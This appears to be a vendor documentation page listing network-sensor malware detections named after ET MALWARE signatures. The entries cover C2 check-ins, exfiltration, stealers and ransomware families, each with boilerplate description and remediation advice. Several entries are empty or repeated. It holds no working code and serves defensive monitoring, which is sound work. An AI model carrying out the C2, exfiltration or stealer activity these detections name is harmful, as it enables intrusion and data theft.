Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Alureon Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Amadey CnC Check-In

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Amadey Stealer CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Amadey Stealer CnC - BotKiller Module Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Android/AhMyth RAT Init Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Android/AhMyth RAT WebSocket Session

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Android/FakeKakao checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Andromeda Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Andromeda Checkin Dec 29 2014

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Andromeda Check-in Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Andromeda Downloading Module

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AntiVirus exe Download Likely FakeAV Install

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AntSword Webshell User-Agent Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AnubisNetworks Sinkhole HTTP Response - 195.22.26.192/26

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Anuna PHP Backdoor Attempt

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Anuna PHP Backdoor Sucessful Exploit

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ApolloLocker Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE ApolloLocker Ransomware CnC Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE AppleJeus - JMT Trading CnC Activity (OSX Variant)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AppleJeus - JMT Trading CnC Activity (Windows Variant)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AppleJeus - Kupay Wallet CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AppleJeus - Union Crypto CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT15/NICKEL KETRUM CnC Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT15/NICKEL Related CnC Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT28 SEDNIT Variant CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT28 SEDNIT Variant CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT28 SEDNIT Variant CnC Beacon 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT28 SEDNIT Variant CnC Beacon 4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT28/SkinnyBoy Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT28/SkinnyBoy Payload Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT28/Sofacy Zebrocy Go Variant Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT28/Sofacy Zebrocy Go Variant CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT28/Sofacy Zebrocy Go Variant Downloader Error POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT28/Sofacy Zebrocy Secondary Payload CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT28 Uploader Variant CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT28 Uploader Variant Fake Request to Google

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT28 Zebrocy/Zekapab Reporting to CnC M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT29 Cache_DLL SSL Cert

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT29 Implant8 - Evil Twitter Callback

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT29 Implant8 - MAL_REFERER

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT29/Wellness CnC Host Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT32 Win32/Ratsnif CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT32 Win32/Ratsnif POSTing Log Message to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT32 Win32/Ratsnif Requesting Command from CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT32 Win32/Ratsnif Submitting Output of Command to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT33/CharmingKitten Encrypted Payload Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT33/CharmingKitten JS/HTA Stage 1 CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT33/CharmingKitten Retrieving New Payload (flowbit set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT34 TONEDEAF 2.0 Requesting Commands from CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT34 TONEDEAF 2.0 Uploading to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT39/Chafer Payload - CnC Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT39/Chafer Payload - CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT.Agtid callback

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT Backspace CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT/Bitter Maldoc Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT-C-23 Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT-C-23 Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT Cheshire Cat CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT CozyCar SSL Cert 2

Description
Copy link

Recommendation
Copy link

ET MALWARE APT CozyCar SSL Cert 5

Description
Copy link

Recommendation
Copy link

ET MALWARE APT CozyCar SSL Cert 6

Description
Copy link

Recommendation
Copy link

ET MALWARE APT CozyCar SSL Cert 7

Description
Copy link

Recommendation
Copy link

ET MALWARE APT CozyCar SSL Cert 8

Description
Copy link

Recommendation
Copy link

ET MALWARE APT/Donot Group Checkin Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT/FamousSparrow Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT.Fwits CnC Beacon M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT.Fwits CnC Beacon M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT Hellsing Proxy Checker Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT Lazarus Nukesped Downloader

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT LuckyMouse Polpo Malware CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT LuckyMouse Polpo Malware CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT LuckyMouse Polpo Malware CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT Lurker POST CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT Mustang Panda Payload - CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT_NGO_wuaclt

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT_NGO_wuaclt C2 Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT Operation Sidecopy lnk Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT OSX.XSLCmd CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT/TransparentTribe CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT/TransparentTribe Style Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arbitrium-RAT CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arbitrium-RAT Observed User-Agent (JustKidding)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ArcDoor Intial Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ArcDoor User-Agent (ALIZER)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ares Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Advtravel Campaign GET Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Checking filename

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Exfiltrating files

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT File information

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Possible User-Agent (SK)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Possible User-Agent (Skype)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Possible User-Agent (Skypee)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Transmitting Date

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Transmitting Serial

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AridViper CnC Domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arkei Stealer Config Download Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arkei Stealer IP Lookup

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ARM Binary Requested via WGET to Known IoT Malware Domain

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ArrobarLoader CnC Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ArtraDownloader CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ArtraDownloader/TeleRAT Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ASNAROK Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Asprox Data Post to C&C

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Asprox Form Submission to C&C

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Asterope Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AstroBot CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Athena DDoS Bot Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Atya Dropper Possible Rootkit - HTTP GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Aura Ransomware User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

